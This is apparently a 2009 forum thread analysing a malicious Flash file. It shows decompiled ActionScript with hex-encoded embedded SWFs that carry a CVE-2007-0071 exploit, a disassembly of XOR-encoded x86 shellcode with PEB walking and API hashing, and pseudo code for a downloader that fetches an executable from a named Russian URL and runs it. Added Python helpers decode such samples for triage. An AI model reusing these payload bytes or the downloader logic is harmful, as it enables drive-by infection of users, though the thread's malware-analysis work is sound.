07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 
4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815E1988AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000002C5A586863206A68666C756573206F6677387972206B6A64207333 643566363420383735676673206572776F38657237773933323834373938333220652D3023242A282A295F2A2625495E2A26 2648474648474454524544262A2828554A484848480000"
//80 0f
_as3_coerce String
//d7
_as3_setlocal <3>
//2c 2f
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 
4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A8158C968AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927FC6275FC6271FCE82AFBFFFF00FC2902FC637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65000000000030383439332D383772206861736C69643861373677726569717866 676C61736620777335746536346520373874206535662073206C64666B6873616C206A68666B6C756973646F667177613772 3330383720202069737565682075697779756972200000"
//80 0f
_as3_coerce String
//63 04
_as3_setlocal <4>
//2c 30
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 
4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815A5848AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E650000000000657566686A646B6A7A6B6A79646F71756977363734653038323032 3938343837207969736837717567736438393339742D7467206C6B6A63676C6A646B6C797468646B68676679773837797230 73666B646873667338376F653635373839373933390000"
//80 0f
_as3_coerce String
//63 05
_as3_setlocal <5>
//2c 31
_as3_pushstring "[hex string omitted]"
//80 0f
_as3_coerce String
//63 06
_as3_setlocal <6>
//2c 32
_as3_pushstring "[string omitted]"
//80 0f
_as3_coerce String
//63 07
_as3_setlocal <7>
//2c 33
_as3_pushstring "[string omitted]"
//80 0f
_as3_coerce String
//63 08
_as3_setlocal <8>
//2c 34
_as3_pushstring "[string omitted]"
//80 0f
_as3_coerce String
//63 09
_as3_setlocal <9>
//2c 35
_as3_pushstring "[string omitted]"
//80 0f
_as3_coerce String
//63 0a
_as3_setlocal <10>
//2c 36
_as3_pushstring "[string omitted]"
//80 0f
_as3_coerce String
//63 0b
_as3_setlocal <11>
//2c 37
_as3_pushstring "[string omitted]"

So, the secret is in there, please rip it apart for us.

evaluator
February 6th, 2009, 15:04
delta, IF you mean those HEX bytes, then I already decoded them into little SWFs (read prev posts),
AND now about them I asked:
>>schizoM, is something interesting in that little decoded SWFs?

because I have not seen "x86 code" there, but those SWFs. OOKK!!??

dELTA
February 6th, 2009, 18:26
Ok Eval, since that post of yours was before schizoM took a look, I assumed that he looked at everything in it...

schizoM, can you find something interesting in the smaller SWFs in the "dec_swf.zip" file that Evaluator attached previously in this thread?

If there is indeed an exploit in any of the SWFs, there will be x86 code somewhere, even if it might be encrypted or obfuscated...

051r15
March 18th, 2009, 06:56
_as3_pushstring "[hex string omitted]"

This isn't shellcode; if you look at the first 3 bytes of hex you'll see it's FWS in ASCII, which suggests it's another Flash file, which launches a typical CVE-2007-0071 exploit.

The code selects which version of flash and launches the appropriate flash byte stream.
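
Added example, not part of the thread or of any tool used in it: a triage pass over a decompiler listing that decodes each hex `_as3_pushstring` literal and reports the ones that begin with an SWF signature, as the post above describes. The sample listing and the `_swf` helper are constructed for illustration.

```python
import re
import struct

# SWF signatures: the first three bytes of every Flash file.
SWF_MAGIC = {b"FWS": "uncompressed", b"CWS": "zlib-compressed", b"ZWS": "lzma-compressed"}
PUSHSTRING = re.compile(r'_as3_pushstring\s+"([0-9A-Fa-f\s]{16,})"')

def find_embedded_swf(listing):
    """Scan a decompiler listing for hex string literals that decode to SWF files."""
    hits = []
    for match in PUSHSTRING.finditer(listing):
        hex_text = "".join(match.group(1).split())   # dumps often wrap hex with spaces
        if len(hex_text) % 2:
            continue                                  # odd digit count: not clean bytes
        raw = bytes.fromhex(hex_text)
        if len(raw) < 8 or raw[:3] not in SWF_MAGIC:
            continue
        declared = struct.unpack_from("<I", raw, 4)[0]  # FileLength, little-endian
        hits.append({
            "offset": match.start(),
            "signature": raw[:3].decode("ascii"),
            "encoding": SWF_MAGIC[raw[:3]],
            "version": raw[3],
            "declared_length": declared,
            "actual_length": len(raw),
            # For FWS the declared length should equal the decoded size.
            "length_mismatch": raw[:3] == b"FWS" and declared != len(raw),
        })
    return hits

def _swf(sig, version, declared, body_len):
    """Constructed 8-byte SWF header plus zero padding, as an uppercase hex string."""
    return (sig + bytes([version]) + struct.pack("<I", declared) + bytes(body_len)).hex().upper()

# Constructed sample listing (not the strings posted in the thread).
SAMPLE = "\n".join([
    '_as3_pushstring "%s"' % _swf(b"FWS", 8, 24, 16),
    '_as3_coerce String',
    '_as3_pushstring "WIN 9,0,115,0"',
    '_as3_pushstring "%s"' % _swf(b"FWS", 9, 4096, 16),
    '_as3_pushstring "%s"' % ("41" * 12),
])

if __name__ == "__main__":
    for hit in find_embedded_swf(SAMPLE):
        print(hit)
```

A length mismatch on an uncompressed file is worth a closer look, since it means the header's length field disagrees with the data that was actually embedded.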

dELTA
March 19th, 2009, 10:37
Quote:
[Originally Posted by 051r15;79742]...if you look at the first 3 bytes of hex you'll see it's FWS in ASCII, which suggests it's another Flash file, which launches a typical CVE-2007-0071 exploit.

...which in turn would contain the shell code, yes?

Just because the most inner doll in one of those Russian dolls is placed inside yet another doll, it doesn't mean that it's not still inside the most outer doll, you know...

Nice analysis though.

051r15
March 25th, 2009, 06:38
Yes, dolls within dolls; the shell code starts at 0xfc

fc call 10f
10f call 114
114 pop ebp
115 add ebp, 14
118 mov ecx, 18b
11d mov al, 3d
11f xor [ebp+00], al
122 inc ebp
123 dec ecx
124 jnz 11f
... xor 0x3d section of memory 128-2B3
135 pop edi
136 mov eax, [fs:30] ; get a pointer to the Process Environment Block
13c js 4e
13e mov eax, [eax+0c] ;
141 mov esi, [eax+1c]
144 lodsd
145 mov ebp, [eax+08] ; get a pointer to Kernel32 pe structure
148 jmp 153
153 mov esi, edi
155 push 04
157 pop ecx
158 call f0

Uses the following function to look up the address of the functions in the DLL based on a precomputed hash:

1ec push ecx
1ed push esi
1ee mov esi, [ebp+3c]
1f1 mov esi, [ebp+esi+78]
1f5 add esi, ebp
1f7 push esi
1f8 mov esi, [esi+20]
1fb add esi, ebp
1fd xor ecx, ecx
1ff dec ecx
200 inc ecx
201 lodsd
202 add eax, ebp
204 xor ebx, ebx
206 movsx edx, byte ptr [eax]
209 cmp dl, dh
20b jz 215
20d ror ebx, 0d
210 add ebx, edx
212 inc eax
213 jmp 206

215 cmp ebx, [edi]
217 jnz 104
219 pop esi
21a mov ebx, [esi+24]
21d add ebx, ebp
21f mov cx, [ecx*2+ebx]
223 mov ebx, [esi+1c]
226 add ebx, ebp
228 mov eax, [ecx*4+ebx]
22b add eax, ebp
22d stosd
22e pop esi
22f pop ecx
230 retn

Pseudo code of downloader

URLMON = KERNEL32.DLL.LoadLibraryA(urlmon)
KERNEL32.DLL.GetTempPathA(260, tmp_file)
URLMON.URLDownloadToFileA(0, "http://firstgate.ru/stat/getexe2.php?id=123&0","tmp_file", 0, 0)
KERNEL32.DLL.WinExec("tmp_file", 1)
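
Added example, not part of the thread: an analyst's helper that undoes the XOR 0x3d layer over the region the listing gives (0x18b bytes from 0x128) and maps 32-bit constants back to export names using the hash loop shown at 206-213. The candidate names come from the pseudo code above; the sample buffer and its three-entry table are constructed.

```python
import struct

def ror13_hash(name: bytes) -> int:
    """Hash loop at 0x206-0x213: ebx = ror(ebx, 13) + movsx(byte), until NUL."""
    h = 0
    for b in name:
        if b == 0:                                    # cmp dl, dh / jz: stop at NUL
            break
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF      # ror ebx, 0x0d
        h = (h + (b - 256 if b >= 0x80 else b)) & 0xFFFFFFFF  # movsx, then add
    return h

def xor_decode(blob: bytes, start=0x128, count=0x18B, key=0x3D) -> bytes:
    """Undo the decoder loop at 0x11f-0x124: XOR `count` bytes from `start` with `key`."""
    out = bytearray(blob)
    for i in range(start, min(start + count, len(out))):
        out[i] ^= key
    return bytes(out)

def resolve(hashes, candidate_names):
    """Map hash constants to export names; values with no match map to None."""
    table = {ror13_hash(n.encode()): n for n in candidate_names}
    return [(h, table.get(h)) for h in hashes]

# Export names taken from the downloader pseudo code in the post above.
NAMES = ["LoadLibraryA", "GetTempPathA", "WinExec", "URLDownloadToFileA"]

def build_sample() -> bytes:
    """Constructed sample: a 3-entry hash table at 0x128, XOR-encoded with 0x3d."""
    plain = struct.pack("<3I", ror13_hash(b"WinExec"),
                        ror13_hash(b"LoadLibraryA"), 0xDEADBEEF)
    body = plain.ljust(0x18B, b"\x00")
    return b"\x90" * 0x128 + bytes(c ^ 0x3D for c in body)

def annotate(blob: bytes):
    """Decode the region, then label the three dwords at its start."""
    decoded = xor_decode(blob)
    return resolve(struct.unpack_from("<3I", decoded, 0x128), NAMES)

if __name__ == "__main__":
    for value, name in annotate(build_sample()):
        print(f"{value:#010x} -> {name or 'unknown'}")
```

In practice the candidate list would be the full export table of each DLL the code walks, so that every constant in the decoded body can be labelled.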

evaluator
March 26th, 2009, 13:29
wow, you showed it, thank you!
probably code starts at offset FB:

000000FB: 60 pushad
000000FC: E80E000000 call 00000010F
00000101: 90 nop
00000102: 61 popad
00000103: 81C400090000 add esp,000000900
00000109: FF71EC push d,[ecx-014]
0000010C: C20400 retn 4